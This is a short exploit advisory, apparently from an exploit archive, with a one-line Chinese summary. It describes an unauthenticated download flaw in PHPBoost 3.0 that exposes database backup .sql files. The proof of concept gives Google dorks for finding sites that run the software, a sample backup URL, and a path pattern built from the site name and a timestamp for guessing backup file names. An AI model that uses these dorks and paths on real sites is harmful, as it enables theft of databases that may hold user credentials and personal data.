PHPBoost 是一款内容管理系统,PHPBoost存在远程文件下载漏洞,可能导致备份用的.sql文件被远程下载。

[+]info:
~~~~~~~~~

# Title : PHPBoost 3.0 Remote Download Backup Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Download Backup Database (*.sql) File
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : Dr.Ride
##
# Go0gle Dorks : 
# 1> "Powered by PHPBoost 3.0" 
# 2> "Boosté par PHPBoost 3.0"
 
[+]poc:
~~~~~~~~~

# Demo:
[localhost]/[path]/cache/backup/backup_phpboost_11-03-29-17-35-34.sql
 
# Exploit :
[localhost]/[path]/cache/backup/backup_[sitname]_*Y*M*D*H*Mn*S*.sql
 
%{
Y = year
M = month
D = day
Mn = minute
S = second
}%
# Download The Backup .SQL File ** The Access Not Forbidden **